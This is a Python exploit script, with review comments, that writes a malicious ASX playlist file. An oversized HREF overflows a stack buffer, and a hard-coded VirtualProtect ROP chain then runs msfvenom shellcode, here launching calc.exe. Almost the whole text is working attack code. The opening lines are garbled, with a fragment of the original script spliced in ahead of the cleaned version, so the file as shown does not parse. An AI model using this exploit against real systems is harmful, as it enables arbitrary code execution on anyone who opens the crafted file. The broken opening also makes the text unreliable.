import struct,sys
head ='''<ASX version="3.0">
<Entry>
<REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes_'''< import struct,sys
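# Exploit skeleton for an ASX playlist overflow: the oversized HREF value
# overruns a stack buffer and lands the ROP chain + shellcode assembled below.
# NOTE(review): the target product/version is not named anywhere in this
# file; every address below is tied to one specific set of module builds.
# Bytes literals (b'...') keep these pieces binary-safe and make the same
# text valid under both Python 2 and 3.
head = b'''<ASX version="3.0">
<Entry>
<REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes_'''

# Filler up to the saved return address (offset 17375, per the author).
junk = b"A" * 17375

# Return-address overwrite, little-endian.  Candidate gadgets the author noted:
#0x1003df8e
#0x774e1035
# NOTE(review): the four bytes below decode to 0x774e1036, not 0x774e1035 as
# the note above says -- confirm which address is intended before reusing.
# (The original text had lost its backslashes, leaving a 12-character string
# instead of 4 bytes, which silently shifted every later offset.)
EIP = b"\x36\x10\x4e\x77"

# Four bytes that sit between the overwritten return and the chain start.
adjust = b"A" * 4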

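def create_rop_chain():
    """Return the VirtualProtect ROP chain as little-endian packed bytes.

    Per the per-gadget comments this is the usual mona.py layout: resolve
    VirtualProtect through its IAT slot into ESI, stage a `push esp # ret`
    in EBP, NEG two values into EBX (size 0x201) and EDX (new protection
    0x40), point ECX at a writable slot for the old-protection out-param,
    put a RETN nop in EDI, then PUSHAD to lay the call frame out.

    Every address is hard-coded for the module builds named in the comments
    (MFC42, MSVCP60, ntdll, USER32, SHELL32, WS2_32, OLEAUT32, WMVCore and
    the player's own MSA2M*/msvos DLLs); any other build needs a new chain.
    The original listing had lost its indentation, which is a syntax error.

    Returns:
        bytes (str on Python 2): 21 gadgets * 4 bytes = 84 bytes.
    """
    rop_gadgets = [
        0x73dd5dce,  # POP EAX # RETN [MFC42.DLL]
        0x5d091368,  # ptr to &VirtualProtect() [IAT COMCTL32.dll]
        0x7608708e,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSVCP60.dll]
        0x73dd40f1,  # XCHG EAX,ESI # RETN [MFC42.DLL]
        0x7c96feb7,  # POP EBP # RETN [ntdll.dll]
        0x7608fcec,  # & push esp # ret [MSVCP60.dll]
        0x01c395d4,  # POP EAX # RETN [MSA2Mcodec00.dll]
        0xfffffdff,  # Value to negate, will become 0x00000201
        0x77d74960,  # NEG EAX # RETN [USER32.dll]
        0x7ca485b4,  # XCHG EAX,EBX # RETN [SHELL32.dll]
        0x01d64827,  # POP EAX # RETN [msvos.dll]
        0xffffffc0,  # Value to negate, will become 0x00000040
        0x77d74960,  # NEG EAX # RETN [USER32.dll]
        0x71ab9b46,  # XCHG EAX,EDX # RETN [WS2_32.dll]
        0x1003fd11,  # POP ECX # RETN [MSA2Mfilter03.dll]
        0x77da1d04,  # &Writable location [USER32.dll]
        0x01d34691,  # POP EDI # RETN [MSA2Mctn01.dll]
        0x76091182,  # RETN (ROP NOP) [MSVCP60.dll]
        0x7d7da123,  # POP EAX # RETN [WMVCore.DLL]
        0x90909090,  # nop
        0x77195015,  # PUSHAD # RETN [OLEAUT32.dll]
    ]
    # b'' rather than '': struct.pack returns bytes on Python 3, and a str
    # separator would raise TypeError there; on Python 2 b'' == ''.
    return b''.join(struct.pack('<I', gadget) for gadget in rop_gadgets)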

# Built once at import time; the chain is fixed bytes, so it is reused as-is
# when the payload is assembled below.
rop_chain = create_rop_chain()

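# msfvenom -a x86 --platform Windows -p windows/exec cmd=calc.exe -f python -b "\x00\x0a\x0d" EXITFUNC=seh
# badcharacters "\x00\x0a\x0d"
# The original text had lost every backslash ("xda" instead of "\xda"), which
# turns each byte into three ASCII characters and breaks the length budget.
# 220 bytes; bytes literals so the same text runs under Python 2 and 3.
buf = b""
buf += b"\xda\xd6\xba\xf5\xa4\x32\xf4\xd9\x74\x24\xf4\x5d\x31"
buf += b"\xc9\xb1\x31\x83\xc5\x04\x31\x55\x14\x03\x55\xe1\x46"
buf += b"\xc7\x08\xe1\x05\x28\xf1\xf1\x69\xa0\x14\xc0\xa9\xd6"
buf += b"\x5d\x72\x1a\x9c\x30\x7e\xd1\xf0\xa0\xf5\x97\xdc\xc7"
buf += b"\xbe\x12\x3b\xe9\x3f\x0e\x7f\x68\xc3\x4d\xac\x4a\xfa"
buf += b"\x9d\xa1\x8b\x3b\xc3\x48\xd9\x94\x8f\xff\xce\x91\xda"
buf += b"\xc3\x65\xe9\xcb\x43\x99\xb9\xea\x62\x0c\xb2\xb4\xa4"
buf += b"\xae\x17\xcd\xec\xa8\x74\xe8\xa7\x43\x4e\x86\x39\x82"
buf += b"\x9f\x67\x95\xeb\x10\x9a\xe7\x2c\x96\x45\x92\x44\xe5"
buf += b"\xf8\xa5\x92\x94\x26\x23\x01\x3e\xac\x93\xed\xbf\x61"
buf += b"\x45\x65\xb3\xce\x01\x21\xd7\xd1\xc6\x59\xe3\x5a\xe9"
buf += b"\x8d\x62\x18\xce\x09\x2f\xfa\x6f\x0b\x95\xad\x90\x4b"
buf += b"\x76\x11\x35\x07\x9a\x46\x44\x4a\xf0\x99\xda\xf0\xb6"
buf += b"\x9a\xe4\xfa\xe6\xf2\xd5\x71\x69\x84\xe9\x53\xce\x74"
buf += b"\x1b\x6e\xda\xe1\x82\x1b\xa7\x6f\x35\xf6\xeb\x89\xb6"
buf += b"\xf3\x93\x6d\xa6\x71\x96\x2a\x60\x69\xea\x23\x05\x8d"
buf += b"\x59\x43\x0c\xee\x3c\xd7\xcc\xdf\xdb\x5f\x76\x20"

# Ten bytes of padding ahead of the encoded payload; presumably breathing
# room between the chain and the decoder stub -- the author does not say.
shellcode = b"S" * 10 + buf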

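# Function-call prints with a single %-formatted argument produce the same
# output as the Python 2 print statements they replace and also run on 3.
print("Length of shellcode is: %d" % len(shellcode))
print("Length of ropchain is: %d" % len(rop_chain))

# Filler needed to reach the author's 26000-byte budget after the fixed
# pieces (junk 17375, EIP 4, adjust 4) plus the shellcode and chain.
# The original hard-coded 8303, which is exactly this formula for the
# current 230-byte shellcode and 84-byte chain; computing it keeps the
# filler in step if either piece is regenerated.
garbage_len = 26000 - 17375 - 4 - 4 - len(shellcode) - len(rop_chain)
print("Calculating Garbage: %d" % garbage_len)

garbage = b"C" * garbage_len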

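foot = b'''_playlis.wma"/>
</Entry>
</ASX>'''

# Stack picture the file delivers: filler up to the saved return, the
# overwritten return (EIP), a 4-byte gap, the VirtualProtect chain, the
# padded shellcode, then filler out to the length budget, then the closing
# XML so the playlist still parses far enough to reach the HREF.
payload = head + junk + EIP + adjust + rop_chain + shellcode + garbage + foot

# "wb", not "w": the payload is binary (packed addresses, encoded shellcode)
# and text mode on Windows rewrites every 0x0a as 0x0d 0x0a, silently
# altering the file.  The context manager closes the handle even if the
# write raises, where the original would have leaked it.
with open("exploit.asx", "wb") as fobj:
    fobj.write(payload)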